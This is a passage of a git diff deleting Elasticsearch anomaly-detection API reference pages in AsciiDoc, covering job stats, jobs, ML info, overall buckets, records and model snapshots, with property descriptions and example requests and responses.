-`records`::: -(object) The `avg`, `min`, `max` and `total` number of `model_forecast` documents -written for forecasts related to this job. If there are no forecasts, this -property is omitted. - -`status`::: -(object) The count of forecasts by their status. For example: -{"finished" : 2, "started" : 1}. If there are no forecasts, this property is -omitted. - -`total`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=forecast-total] -==== -//End forecasts_stats - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -//Begin model_size_stats -[[modelsizestats]]`model_size_stats`:: -(object) An object that provides information about the size and contents of the -model. -+ -.Properties of `model_size_stats` -[%collapsible%open] -==== -`bucket_allocation_failures_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-allocation-failures-count] - -`categorized_doc_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorized-doc-count] - -`categorization_status`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=categorization-status] - -`dead_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=dead-category-count] - -`failed_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=failed-category-count] - -`frequent_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=frequent-category-count] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`log_time`::: -(date) The timestamp of the `model_size_stats` according to server time. - -`memory_status`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-status] - -`model_bytes`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes] - -`model_bytes_exceeded`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-bytes-exceeded] - -`model_bytes_memory_limit`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-memory-limit-anomaly-jobs] - -`peak_model_bytes`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=peak-model-bytes] - -`rare_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=rare-category-count] - -`result_type`::: -(string) For internal use. The type of result. - -`total_by_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-by-field-count] - -`total_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-category-count] - -`total_over_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-over-field-count] - -`total_partition_field_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=total-partition-field-count] - -`timestamp`::: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=model-timestamp] -==== -//End model_size_stats - -//Begin node -[[stats-node]]`node`:: -(object) Contains properties for the node that runs the job. This information is -available only for open jobs. -+ -.Properties of `node` -[%collapsible%open] -==== -`attributes`::: -(object) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-attributes] - -`ephemeral_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-ephemeral-id] - -`id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-id] - -`name`::: -(string) -The node name. - -`transport_address`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=node-transport-address] -==== -//End node - -`open_time`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=open-time] - -`state`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=state-anomaly-job] - -//Begin timing_stats -[[timingstats]]`timing_stats`:: -(object) An object that provides statistical information about timing aspect of -this job. -+ -.Properties of `timing_stats` -[%collapsible%open] -==== -`average_bucket_processing_time_ms`::: -(double) Average of all bucket processing times in milliseconds. - -`bucket_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-count] - -`exponential_average_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average] - -`exponential_average_bucket_processing_time_per_hour_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-exponential-average-hour] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`maximum_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-maximum] - -`minimum_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-minimum] - -`total_bucket_processing_time_ms`::: -(double) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-time-total] -==== -//End timing_stats - -[[ml-get-job-stats-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-get-job-stats-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/low_request_rate/_stats --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The API returns the following results: -[source,js] ----- -{ - "count" : 1, - "jobs" : [ - { - "job_id" : "low_request_rate", - "data_counts" : { - "job_id" : "low_request_rate", - "processed_record_count" : 1216, - "processed_field_count" : 1216, - "input_bytes" : 51678, - "input_field_count" : 1216, - "invalid_date_count" : 0, - "missing_field_count" : 0, - "out_of_order_timestamp_count" : 0, - "empty_bucket_count" : 242, - "sparse_bucket_count" : 0, - "bucket_count" : 1457, - "earliest_record_timestamp" : 1575172659612, - "latest_record_timestamp" : 1580417369440, - "last_data_time" : 1576017595046, - "latest_empty_bucket_timestamp" : 1580356800000, - "input_record_count" : 1216 - }, - "model_size_stats" : { - "job_id" : "low_request_rate", - "result_type" : "model_size_stats", - "model_bytes" : 41480, - "model_bytes_exceeded" : 0, - "model_bytes_memory_limit" : 10485760, - "total_by_field_count" : 3, - "total_over_field_count" : 0, - "total_partition_field_count" : 2, - "bucket_allocation_failures_count" : 0, - "memory_status" : "ok", - "categorized_doc_count" : 0, - "total_category_count" : 0, - "frequent_category_count" : 0, - "rare_category_count" : 0, - "dead_category_count" : 0, - "failed_category_count" : 0, - "categorization_status" : "ok", - "log_time" : 1576017596000, - "timestamp" : 1580410800000 - }, - "forecasts_stats" : { - "total" : 1, - "forecasted_jobs" : 1, - "memory_bytes" : { - "total" : 9179.0, - "min" : 9179.0, - "avg" : 9179.0, - "max" : 9179.0 - }, - "records" : { - "total" : 168.0, - "min" : 168.0, - "avg" : 168.0, - "max" : 168.0 - }, - "processing_time_ms" : { - "total" : 40.0, - "min" : 40.0, - "avg" : 40.0, - "max" : 40.0 - }, - "status" : { - "finished" : 1 - } - }, - "state" : "opened", - "node" : { - "id" : "7bmMXyWCRs-TuPfGJJ_yMw", - "name" : "node-0", - "ephemeral_id" : "hoXMLZB0RWKfR9UPPUCxXX", - "transport_address" : "127.0.0.1:9300", - "attributes" : { - "ml.machine_memory" : "17179869184", - "xpack.installed" : "true", - "ml.max_open_jobs" : "20" - } - }, - "assignment_explanation" : "", - "open_time" : "13s", - "timing_stats" : { - "job_id" : "low_request_rate", - "bucket_count" : 1457, - "total_bucket_processing_time_ms" : 1094.000000000001, - "minimum_bucket_processing_time_ms" : 0.0, - "maximum_bucket_processing_time_ms" : 48.0, - "average_bucket_processing_time_ms" : 0.75085792724777, - "exponential_average_bucket_processing_time_ms" : 0.5571716855800993, - "exponential_average_bucket_processing_time_per_hour_ms" : 15.0 - } - } - ] -} ----- \ No newline at end of file diff --git a/docs/reference/ml/anomaly-detection/apis/get-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-job.asciidoc deleted file mode 100644 index fe89201d3e1..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-job.asciidoc +++ /dev/null @@ -1,150 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-job]] -= Get {anomaly-jobs} API -++++ -Get jobs -++++ - -Retrieves configuration information for {anomaly-jobs}. - -[[ml-get-job-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors/` + - -`GET _ml/anomaly_detectors/,` + - -`GET _ml/anomaly_detectors/` + - -`GET _ml/anomaly_detectors/_all` - -[[ml-get-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-job-desc]] -== {api-description-title} - -You can get information for multiple {anomaly-jobs} in a single API request by -using a group name, a comma-separated list of jobs, or a wildcard expression. -You can get information for all {anomaly-jobs} by using `_all`, by specifying -`*` as the ``, or by omitting the ``. - -IMPORTANT: This API returns a maximum of 10,000 jobs. - -[[ml-get-job-path-parms]] -== {api-path-parms-title} - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-default] - -[[ml-get-job-query-parms]] -== {api-query-parms-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -[[ml-get-job-results]] -== {api-response-body-title} - -The API returns an array of {anomaly-job} resources. For the full list of -properties, see <>. - -`create_time`:: -(string) The time the job was created. For example, `1491007356077`. This -property is informational; you cannot change its value. - -`finished_time`:: -(string) If the job closed or failed, this is the time the job finished. -Otherwise, it is `null`. This property is informational; you cannot change its -value. - -`job_type`:: -(string) Reserved for future use, currently set to `anomaly_detector`. - -`job_version`:: -(string) The version of {es} that existed on the node when the job was created. - -`model_snapshot_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] - -[[ml-get-job-response-codes]] -== {api-response-codes-title} - -`404` (Missing resources):: - If `allow_no_match` is `false`, this code indicates that there are no - resources that match the request or only partial matches for the request. - -[[ml-get-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/high_sum_total_sales --------------------------------------------------- -// TEST[skip:Kibana sample data] - -The API returns the following results: - -[source,js] ----- -{ - "count": 1, - "jobs": [ - { - "job_id" : "high_sum_total_sales", - "job_type" : "anomaly_detector", - "job_version" : "7.5.0", - "groups" : [ - "kibana_sample_data", - "kibana_sample_ecommerce" - ], - "description" : "Find customers spending an unusually high amount in an hour", - "create_time" : 1577221534700, - "analysis_config" : { - "bucket_span" : "1h", - "detectors" : [ - { - "detector_description" : "High total sales", - "function" : "high_sum", - "field_name" : "taxful_total_price", - "over_field_name" : "customer_full_name.keyword", - "detector_index" : 0 - } - ], - "influencers" : [ - "customer_full_name.keyword", - "category.keyword" - ] - }, - "analysis_limits" : { - "model_memory_limit" : "10mb", - "categorization_examples_limit" : 4 - }, - "data_description" : { - "time_field" : "order_date", - "time_format" : "epoch_ms" - }, - "model_plot_config" : { - "enabled" : true - }, - "model_snapshot_retention_days" : 10, - "daily_model_snapshot_retention_after_days" : 1, - "custom_settings" : { - "created_by" : "ml-module-sample", - ... - }, - "model_snapshot_id" : "1575402237", - "results_index_name" : "shared", - "allow_lazy_open" : false - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-ml-info.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-ml-info.asciidoc deleted file mode 100644 index 17250027828..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-ml-info.asciidoc +++ /dev/null @@ -1,127 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[get-ml-info]] -= Get machine learning info API - -[subs="attributes"] -++++ -Get {ml} info -++++ - -Returns defaults and limits used by machine learning. - -[[get-ml-info-request]] -== {api-request-title} - -`GET _ml/info` - -[[get-ml-info-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <> and -{ml-docs-setup-privileges}. - -[[get-ml-info-desc]] -== {api-description-title} - -This endpoint is designed to be used by a user interface that needs to fully -understand machine learning configurations where some options are not specified, -meaning that the defaults should be used. This endpoint may be used to find out -what those defaults are. - -[[get-ml-info-example]] -== {api-examples-title} - -The endpoint takes no arguments: - -[source,console] --------------------------------------------------- -GET _ml/info --------------------------------------------------- -// TEST - -This is a possible response: - -[source,console-result] ----- -{ - "defaults" : { - "anomaly_detectors" : { - "categorization_analyzer" : { - "tokenizer" : "ml_classic", - "filter" : [ - { - "type" : "stop", - "stopwords" : [ - "Monday", - "Tuesday", - "Wednesday", - "Thursday", - "Friday", - "Saturday", - "Sunday", - "Mon", - "Tue", - "Wed", - "Thu", - "Fri", - "Sat", - "Sun", - "January", - "February", - "March", - "April", - "May", - "June", - "July", - "August", - "September", - "October", - "November", - "December", - "Jan", - "Feb", - "Mar", - "Apr", - "May", - "Jun", - "Jul", - "Aug", - "Sep", - "Oct", - "Nov", - "Dec", - "GMT", - "UTC" - ] - } - ] - }, - "model_memory_limit" : "1gb", - "categorization_examples_limit" : 4, - "model_snapshot_retention_days" : 10, - "daily_model_snapshot_retention_after_days" : 1 - }, - "datafeeds" : { - "scroll_size" : 1000 - } - }, - "upgrade_mode": false, - "native_code" : { - "version": "7.0.0", - "build_hash": "99a07c016d5a73" - }, - "limits" : { - "effective_max_model_memory_limit": "28961mb" - } -} ----- -// TESTRESPONSE[s/"upgrade_mode": false/"upgrade_mode": $body.upgrade_mode/] -// TESTRESPONSE[s/"version": "7.0.0",/"version": "$body.native_code.version",/] -// TESTRESPONSE[s/"build_hash": "99a07c016d5a73"/"build_hash": "$body.native_code.build_hash"/] -// TESTRESPONSE[s/"effective_max_model_memory_limit": "28961mb"/"effective_max_model_memory_limit": "$body.limits.effective_max_model_memory_limit"/] -// TESTRESPONSE[s/"total_ml_memory": "86883mb"/"total_ml_memory": "$body.limits.total_ml_memory"/] -// TESTRESPONSE[skip:"AwaitsFix https://github.com/elastic/elasticsearch/issues/66629"] diff --git a/docs/reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc deleted file mode 100644 index 78040a54987..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-overall-buckets.asciidoc +++ /dev/null @@ -1,212 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-overall-buckets]] -= Get overall buckets API -++++ -Get overall buckets -++++ - -Retrieves overall bucket results that summarize the bucket results of multiple -{anomaly-jobs}. - -[[ml-get-overall-buckets-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/overall_buckets` + - -`GET _ml/anomaly_detectors/,/results/overall_buckets` + - -`GET _ml/anomaly_detectors/_all/results/overall_buckets` - -[[ml-get-overall-buckets-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-overall-buckets-desc]] -== {api-description-title} - -You can summarize the bucket results for all {anomaly-jobs} by using `_all` or -by specifying `*` as the ``. - -By default, an overall bucket has a span equal to the largest bucket span of the -specified {anomaly-jobs}. To override that behavior, use the optional -`bucket_span` parameter. To learn more about the concept of buckets, see -{ml-docs}/ml-buckets.html[Buckets]. - -The `overall_score` is calculated by combining the scores of all the buckets -within the overall bucket span. First, the maximum `anomaly_score` per -{anomaly-job} in the overall bucket is calculated. Then the `top_n` of those -scores are averaged to result in the `overall_score`. This means that you can -fine-tune the `overall_score` so that it is more or less sensitive to the number -of jobs that detect an anomaly at the same time. For example, if you set `top_n` -to `1`, the `overall_score` is the maximum bucket score in the overall bucket. -Alternatively, if you set `top_n` to the number of jobs, the `overall_score` is -high only when all jobs detect anomalies in that overall bucket. If you set -the `bucket_span` parameter (to a value greater than its default), the -`overall_score` is the maximum `overall_score` of the overall buckets that have -a span equal to the jobs' largest bucket span. - -[[ml-get-overall-buckets-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection-wildcard-list] - -[[ml-get-overall-buckets-request-body]] -== {api-request-body-title} - -`allow_no_match`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=allow-no-jobs] - -`bucket_span`:: -(Optional, string) The span of the overall buckets. Must be greater or equal to -the largest bucket span of the specified {anomaly-jobs}, which is the default -value. - -`end`:: -(Optional, string) Returns overall buckets with timestamps earlier than this -time. - -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] -+ --- -If any of the job bucket results within the overall bucket interval are interim -results, the overall bucket results are interim results. --- - -`overall_score`:: -(Optional, double) Returns overall buckets with overall scores greater than or -equal to this value. - -`start`:: -(Optional, string) Returns overall buckets with timestamps after this time. - -`top_n`:: -(Optional, integer) The number of top {anomaly-job} bucket scores to be used in -the `overall_score` calculation. The default value is `1`. - -[[ml-get-overall-buckets-results]] -== {api-response-body-title} - -The API returns an array of overall bucket objects, which have the following -properties: - -`bucket_span`:: -(number) The length of the bucket in seconds. Matches the job with the longest `bucket_span` value. - -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`jobs`:: -(array) An array of objects that contain the `max_anomaly_score` per `job_id`. - -`overall_score`:: -(number) The `top_n` average of the maximum bucket `anomaly_score` per job. - -`result_type`:: -(string) Internal. This is always set to `overall_bucket`. - -`timestamp`:: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timestamp-results] - -[[ml-get-overall-buckets-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/job-*/results/overall_buckets -{ - "overall_score": 80, - "start": "1403532000000" -} --------------------------------------------------- -// TEST[skip:todo] - -In this example, the API returns a single result that matches the specified -score and time constraints. The `overall_score` is the max job score as -`top_n` defaults to 1 when not specified: -[source,js] ----- -{ - "count": 1, - "overall_buckets": [ - { - "timestamp" : 1403532000000, - "bucket_span" : 3600, - "overall_score" : 80.0, - "jobs" : [ - { - "job_id" : "job-1", - "max_anomaly_score" : 30.0 - }, - { - "job_id" : "job-2", - "max_anomaly_score" : 10.0 - }, - { - "job_id" : "job-3", - "max_anomaly_score" : 80.0 - } - ], - "is_interim" : false, - "result_type" : "overall_bucket" - } - ] -} ----- - -The next example is similar but this time `top_n` is set to `2`: - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/job-*/results/overall_buckets -{ - "top_n": 2, - "overall_score": 50.0, - "start": "1403532000000" -} --------------------------------------------------- -// TEST[skip:todo] - -Note how the `overall_score` is now the average of the top 2 job scores: -[source,js] ----- -{ - "count": 1, - "overall_buckets": [ - { - "timestamp" : 1403532000000, - "bucket_span" : 3600, - "overall_score" : 55.0, - "jobs" : [ - { - "job_id" : "job-1", - "max_anomaly_score" : 30.0 - }, - { - "job_id" : "job-2", - "max_anomaly_score" : 10.0 - }, - { - "job_id" : "job-3", - "max_anomaly_score" : 80.0 - } - ], - "is_interim" : false, - "result_type" : "overall_bucket" - } - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-record.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-record.asciidoc deleted file mode 100644 index 7b85f8223e0..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-record.asciidoc +++ /dev/null @@ -1,245 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-record]] -= Get records API -++++ -Get records -++++ - -Retrieves anomaly records for an {anomaly-job}. - -[[ml-get-record-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/records` - -[[ml-get-record-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. See <>, <>, and -{ml-docs-setup-privileges}. - -[[ml-get-record-desc]] -== {api-description-title} - -Records contain the detailed analytical results. They describe the anomalous -activity that has been identified in the input data based on the detector -configuration. - -There can be many anomaly records depending on the characteristics and size of -the input data. In practice, there are often too many to be able to manually -process them. The {ml-features} therefore perform a sophisticated aggregation of -the anomaly records into buckets. - -The number of record results depends on the number of anomalies found in each -bucket, which relates to the number of time series being modeled and the number -of detectors. - -[[ml-get-record-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-get-record-request-body]] -== {api-request-body-title} - -`desc`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=desc-results] - -`end`:: -(Optional, string) Returns records with timestamps earlier than this time. - -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] - -`page`.`from`:: -(Optional, integer) Skips the specified number of records. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of records to obtain. - -`record_score`:: -(Optional, double) Returns records with anomaly scores greater or equal than -this value. - -`sort`:: -(Optional, string) Specifies the sort field for the requested records. By -default, the records are sorted by the `anomaly_score` value. - -`start`:: -(Optional, string) Returns records with timestamps after this time. - -[[ml-get-record-results]] -== {api-response-body-title} - -The API returns an array of record objects, which have the following properties: - -`actual`:: -(array) The actual value for the bucket. - -`bucket_span`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`by_field_name`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=by-field-name] - -`by_field_value`:: -(string) The value of the by field. - -`causes`:: -(array) For population analysis, an over field must be specified in the detector. -This property contains an array of anomaly records that are the causes for the -anomaly that has been identified for the over field. If no over fields exist, -this field is not present. This sub-resource contains the most anomalous records -for the `over_field_name`. For scalability reasons, a maximum of the 10 most -significant causes of the anomaly are returned. As part of the core analytical -modeling, these low-level anomaly records are aggregated for their parent over -field record. The causes resource contains similar elements to the record -resource, namely `actual`, `typical`, `geo_results.actual_point`, -`geo_results.typical_point`, `*_field_name` and `*_field_value`. Probability and -scores are not applicable to causes. - -`detector_index`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=detector-index] - -`field_name`:: -(string) Certain functions require a field to operate on, for example, `sum()`. -For those functions, this value is the name of the field to be analyzed. - -`function`:: -(string) The function in which the anomaly occurs, as specified in the -detector configuration. For example, `max`. - -`function_description`:: -(string) The description of the function in which the anomaly occurs, as -specified in the detector configuration. - -`geo_results.actual_point`:: -(string) The actual value for the bucket formatted as a `geo_point`. If the -detector function is `lat_long`, this is a comma delimited string of the -latitude and longitude. - -`geo_results.typical_point`:: -(string) The typical value for the bucket formatted as a `geo_point`. If the -detector function is `lat_long`, this is a comma delimited string of the -latitude and longitude. - -`influencers`:: -(array) If `influencers` was specified in the detector configuration, this array -contains influencers that contributed to or were to blame for an anomaly. - -`initial_record_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the anomalousness of this record. This is the initial value that was calculated -at the time the bucket was processed. - -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`over_field_name`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=over-field-name] - -`over_field_value`:: -(string) The value of the over field. - -`partition_field_name`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=partition-field-name] - -`partition_field_value`:: -(string) The value of the partition field. - -`probability`:: -(number) The probability of the individual anomaly occurring, in the range `0` -to `1`. This value can be held to a high precision of over 300 decimal places, -so the `record_score` is provided as a human-readable and friendly -interpretation of this. - -`multi_bucket_impact`:: -(number) an indication of how strongly an anomaly is multi bucket or single -bucket. The value is on a scale of `-5.0` to `+5.0` where `-5.0` means the -anomaly is purely single bucket and `+5.0` means the anomaly is purely multi -bucket. - -`record_score`:: -(number) A normalized score between 0-100, which is based on the probability of -the anomalousness of this record. Unlike `initial_record_score`, this value will -be updated by a re-normalization process as new data is analyzed. - -`result_type`:: -(string) Internal. This is always set to `record`. - -`timestamp`:: -(date) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=timestamp-results] - -`typical`:: -(array) The typical value for the bucket, according to analytical modeling. - -NOTE: Additional record properties are added, depending on the fields being -analyzed. For example, if it's analyzing `hostname` as a _by field_, then a field -`hostname` is added to the result document. This information enables you to -filter the anomaly results more easily. - -[[ml-get-record-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/low_request_rate/results/records -{ - "sort": "record_score", - "desc": true, - "start": "1454944100000" -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API returns twelve results for the specified -time constraints: -[source,js] ----- -{ - "count" : 4, - "records" : [ - { - "job_id" : "low_request_rate", - "result_type" : "record", - "probability" : 1.3882308899968812E-4, - "multi_bucket_impact" : -5.0, - "record_score" : 94.98554565630553, - "initial_record_score" : 94.98554565630553, - "bucket_span" : 3600, - "detector_index" : 0, - "is_interim" : false, - "timestamp" : 1577793600000, - "function" : "low_count", - "function_description" : "count", - "typical" : [ - 28.254208230188834 - ], - "actual" : [ - 0.0 - ] - }, - ... - ] -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/get-snapshot.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-snapshot.asciidoc deleted file mode 100644 index 7219089922f..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-snapshot.asciidoc +++ /dev/null @@ -1,253 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-snapshot]] -= Get model snapshots API -++++ -Get model snapshots -++++ - -Retrieves information about model snapshots. - -[[ml-get-snapshot-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//model_snapshots` + - -`GET _ml/anomaly_detectors//model_snapshots/` - -[[ml-get-snapshot-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-get-snapshot-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=snapshot-id] -+ --- -You can multiple snapshots for a single job in a single API request -by using a comma-separated list of `` or a wildcard expression. -You can get all snapshots for all calendars by using `_all`, -by specifying `*` as the ``, or by omitting the ``. --- - -[[ml-get-snapshot-request-body]] -== {api-request-body-title} - -`desc`:: - (Optional, Boolean) If true, the results are sorted in descending order. - -`end`:: - (Optional, date) Returns snapshots with timestamps earlier than this time. - -`from`:: - (Optional, integer) Skips the specified number of snapshots. - -`size`:: - (Optional, integer) Specifies the maximum number of snapshots to obtain. - -`sort`:: - (Optional, string) Specifies the sort field for the requested snapshots. By - default, the snapshots are sorted by their timestamp. - -`start`:: - (Optional, string) Returns snapshots with timestamps after this time. - -[role="child_attributes"] -[[ml-get-snapshot-results]] -== {api-response-body-title} - -The API returns an array of model snapshot objects, which have the following -properties: - -`description`:: -(string) An optional description of the job. - -`job_id`:: -(string) A numerical character string that uniquely identifies the job that -the snapshot was created for. - -`latest_record_time_stamp`:: -(date) The timestamp of the latest processed record. - -`latest_result_time_stamp`:: -(date) The timestamp of the latest bucket result. - -`min_version`:: -(string) The minimum version required to be able to restore the model snapshot. - -//Begin model_size_stats -`model_size_stats`:: -(object) Summary information describing the model. -+ -.Properties of `model_size_stats` -[%collapsible%open] -==== -`bucket_allocation_failures_count`::: -(long) The number of buckets for which entities were not processed due to memory -limit constraints. - -`categorized_doc_count`::: -(long) The number of documents that have had a field categorized. - -`categorization_status`::: -(string) The status of categorization for this job. -Contains one of the following values. -+ --- -* `ok`: Categorization is performing acceptably well (or not being -used at all). -* `warn`: Categorization is detecting a distribution of categories -that suggests the input data is inappropriate for categorization. -Problems could be that there is only one category, more than 90% of -categories are rare, the number of categories is greater than 50% of -the number of categorized documents, there are no frequently -matched categories, or more than 50% of categories are dead. - --- - -`dead_category_count`::: -(long) The number of categories created by categorization that will -never be assigned again because another category's definition -makes it a superset of the dead category. (Dead categories are a -side effect of the way categorization has no prior training.) - -`failed_category_count`::: -(long) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=failed-category-count] - -`frequent_category_count`::: -(long) The number of categories that match more than 1% of categorized -documents. - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`log_time`::: -(date) The timestamp that the `model_size_stats` were recorded, according to -server-time. - -`memory_status`::: -(string) The status of the memory in relation to its `model_memory_limit`. -Contains one of the following values. -+ --- -* `hard_limit`: The internal models require more space that the configured -memory limit. Some incoming data could not be processed. -* `ok`: The internal models stayed below the configured value. -* `soft_limit`: The internal models require more than 60% of the configured -memory limit and more aggressive pruning will be performed in order to try to -reclaim space. --- - -`model_bytes`::: -(long) An approximation of the memory resources required for this analysis. - -`model_bytes_exceeded`::: -(long) The number of bytes over the high limit for memory usage at the last allocation failure. - -`model_bytes_memory_limit`::: -(long) The upper limit for memory usage, checked on increasing values. - -`rare_category_count`::: -(long) The number of categories that match just one categorized document. - -`result_type`::: -(string) Internal. This value is always `model_size_stats`. - -`timestamp`::: -(date) The timestamp that the `model_size_stats` were recorded, according to the -bucket timestamp of the data. - -`total_by_field_count`::: -(long) The number of _by_ field values analyzed. Note that these are counted -separately for each detector and partition. - -`total_category_count`::: -(long) The number of categories created by 